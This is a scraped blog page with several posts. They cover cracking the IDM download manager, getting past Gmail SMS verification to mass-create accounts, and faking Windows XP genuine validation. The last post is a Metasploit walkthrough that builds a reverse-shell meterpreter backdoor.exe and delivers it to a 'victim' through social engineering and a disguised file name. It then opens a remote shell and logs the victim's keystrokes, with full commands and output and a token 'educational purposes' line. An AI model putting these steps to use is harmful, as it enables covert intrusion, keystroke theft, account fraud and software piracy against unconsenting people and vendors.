Update & Make IDM Full Version using IDM Cracker Tool (Tested and Working 100%)


I have already posted on how you can make IDM FULL VERSION WITHOUT PATCHING AND CRACKING that works pretty well but if you feel quit a problem using than we found another small tool which can do your work easily and its also compatible for updating your IDM and than making it again full version.



Also check out : INCREASE IDM SPEED USING IDM OPTIMIZER.



IDM Cracker Tool can do your job really easily as its easy user interface makes it more convenient for anyone using, if you are not a big Geek than this tool can simply solve all your problems making your best download manger totally full version without any problem.



idm-cracker-tool

Follow below steps :

1. Download Latest Version of IDM + Cracker Tool. 



     
2. Now after you have downloaded it, Run the tool and make sure you have already installed latest version IDM on your PC.


( NOTE :- Your IDM should not be Running While you Crack IDM....
                  Exit your IDM from Taskbar....
                  By Just Right Clicking on IDM icon on Taskbar and 
                  Click on  EXIT. Then MOVE for Further Steps)

3. So now go to IDM Cracker Tool and than click on Start and it will patch your IDM and now you will have a full working version of IDM. 

Update & Use Again :

So now if any further version is released and you wanna update to that version just first click on Update in this tool and than update it in the official way IDM is updated, after update is completed just click on Start and it will again make your IDM full version.

1 comments:

Bypass Any SMS Verification Very Easily.


 

There are various website like Google, you tube etc that ask for sms verification before registration

Verification Bypass means creating Gmail account without SMS verification code that is generated by Google Systems to enforce users to enter their mobile numbers and receive the verification code. 

As users receive Google verification code, they have to enter it on the submission form and that is the only way to create Gmail account. Unfortunately, your mobile number is only valid for only a few of Gmail accounts. So when you try to put same mobile number more than allowed number of times, Google System restricts you and you cant create more Gmail accounts.

I know you are just too frustrated with the SMS Verification code appearing again and again, because it never lets you create Gmail account as many as you want. Why don't you find a way to bypass Gmail verification code that actually works?
Here we present you a simple trick to bypass it.
1.   Visit HERE

2.   Copy one of the two number written below 
       and put in the fields where they are asking for sms registration

 


0 comments:

Windows Xp Genuine Forever

Windows Xp Genuine Forever




                                  
                                       DOWNLOAD GENUINE FILES


1.Copy all the files from the system32 Folder and 

   paste to  C:WINDOWS:System32/

2.Now go to ///start///---///run///---and type in instexnt install


3.Congratulations,from now u have a genuine copy of Xp


4.U can now add the 1.reg file or restart u pc.


5.Now Run the Microsoft Windows Genuine Check Tool ,

   and see if u PC is 'genuine'.

0 comments:

HACK WINDOWS USING BACK TRACK


 


                      ***********  THE METASPLOIT HACKERS  ***********






Note: This is an advance topic. Read Carefully. 
            Feel free to ask any kind of queries.
            AM always here to help you.
===========================================



If you are really interested in network security, chances are you must have heard of the Metasploit over the last few years.



Metasploit is a hacker's best friend, mainly cause it makes the job of exploitation and post-exploitation a lot easier compared to other traditional methods of hacking.
The topic Metasploit is very vast in itself.However, i'll try keeping it basic and simple so that it could be understood by everyone here. Also, Metasploit can be used with several other tools such as NMap or Nessus (all these tools are present in Backtrack ).


In this tutorial, i'll be teaching you how to exploit a system using a meterpreter payload and start a keylogger on the victim's machine.



Hacking through Metasploit is done in 3 simple steps: 
Point, 
Click, 
0wn.

Before I go into the details of The Metasploit Framework, let me give you a little idea of some basic terms (may seem boring at first, but you must be knowing them) 

Vulnerability: A flaw or weakness in system security procedures, design or implementation that could be exploited resulting in notable damage.

Exploit: A piece of software that take advantage of a bug or vulnerability, leading to privilege escalation or DoS attacks on the target.

Overflow: Error caused when a program tries to store data beyond its size. Maybe used by an attacker to execute malicious codes.

Payload: Actual code which runs on the compromised system after exploitation

Now, what Metasploit IS?
It is an open source penetration testing framework, used for developing and executing attacks against target systems. 
It has a huge database of exploits, also it can be used to write our own 0-day exploits.



METASPLOIT ANTI FORENSICS:
Metasploit has a great collection of tools for anti forensics, making the forensic analysis of the compromised computer little difficult. 
They are released as a part ofMAFIA(Metasploit Anti Forensic Investigation Arsenal). Some of the tools included are Timestomp, Slacker, Sam Juicer, Transmogrify.


Metasploit comes in the following versions:
1. CLI (Command Line Interface)
2. Web Interface
3. MSF Console
4. MSFwx
5. MSFAPI


I recommend using the MSF Console because of its effectiveness & powerful from a pentester’s P0V. Another advantage of this mode is, several sessions of msfconsole could be run simultaneously.


I would recommend you doing the following things in Metasploit, on a Backtrack(system or image), avoiding the windows version of the tool.


For those of all who don't know, Backtrack is a linux distro especially for security personals, including all the tools required by a pentester.


Download Backtrack from HERE. You can download the ISO or VMware image, according to the one you're comfortable with. If you have 2 access to more than 1 system physically, then go for the ISO image and install it on your hard disk.




Let the Hacking Begin :

Open up backtrack. You should have a screen similar to this.



The default login credentials are:

Username: root
Pass: toor


Finally, type "startx" to start the GUI mode:
root@bt:~#startx



NOW YOU ARE IN THE DESKTOP AND MAIN SCREEN OF BACKTRACK 5


First of all, know your Local Ip. 
Opening up a Terminal (on the bottom Right of taskbar) and typing in:

root@bt:~#ifconfig

It would be something like 192.168.x.x or 10.x.x.x.
Have a note of it.

Now,
Launch msfconsole by going to Applications>>Backtrack>>Metasploit Engineering Framework>>Framework Version 3>>msfconsole




You should now be having a shell something similar to a command prompt in windows.




msf >

Let’s now create an executable file which establishes a remote connection between the victim and us, using the meterpreter payload.

Just Type this Command :-msfpayload windows/meterpreter/reverse_tcp LHOST=”your Local IP LPORT=”listening port” x > /root/backdoor.exe


Your local IP is the one you noted earlier and for port you could select 4444.
(Everything has to be entered without quotes)


You should get something like this:
Created by msfpayload (http://www.metasploit.com).
Payload: windows/meterpreter/reverse_tcp
Length: 290
Options: LHOST=192.168.255.130,LPORT=4444


After that, you should be able to see a file named as 
backdoor.exe in /root or on your Back Tack Desktop.

Send the file to the victim by using your Social Engineering skills and let him 


click the file. You can change the name of the file so that it is not that obvious.

Now Open The msf console window of Metasploit 
msf >

Type the following:
msf > use exploit/multi/handler


msf exploit(handler) >

set PAYLOAD windows/meterpreter/



reverse_tcp
PAYLOAD => windows/meterpreter/reverse_tcp


msf exploit(handler) > set LHOST 192.168.255.130
LHOST => 192.168.255.130
msf exploit(handler) > set LPORT 4444
LPORT => 4444


All the connections are done. You have already made an executable file which makes a reverse connection to you.
And now, you have set the meterpreter to listen to you on port 4444.
The last step you have to do now, is to type in “exploit” and press enter,

msf exploit(handler) > exploit


[*] Started reverse handler on 192.168.255.130:4444
[*] Starting the payload handler...
Now, the payload is listening for all the incoming connections on port 444.
[*] Sending stage (749056 bytes) to 192.168.255.1
[*] Meterpreter session 1 opened (192.168.255.130:4444 -> 192.168.255.1:62853) at Sun Mar 13 11:32:12 -0400 2011



You would see a meterpreter prompt like this

meterpreter >

Type in ps to list the active processes

meterpreter > ps


Search for explorer.exe and migrate to the process
meterpreter > migrate 5716
[*] Migrating to 5716...
[*] Migration completed successfully.




Type in the following:

meterpreter > use priv

Now, if you want to start the Keylogger activity on victim, just type keyscan_start



Now, if you want to go to the victim’s computer,
Jus type shell

meterpreter > shell
Process 5428 created.
Channel 1 created.
Microsoft Windows [Version 6.1.7600]
Copyright (c) 2009 Microsoft Corporation. All rights reserved.
C:\Windows\system32>



You would now be having a command prompt,
Type in whoami, to see the computer’s name of victim :

C:\Windows\system32>whoami
whoami
win7-pc\win 7
C:\Windows\system32>

Let’s suppose you want to start a notepad on the victim’s computer.
Type in:

Let’s say the victim has typed in anything on his computer.
Just type exit, to return to meterpreter.

Now type in keyscan_dump, to see all the typed keystrokes :

meterpreter > keyscan_dump

Dumping captured keystrokes...



GaM3 0V3R


P.S.: The above information is just for educational purposes only. You should test it against the computer you own.

0 comments: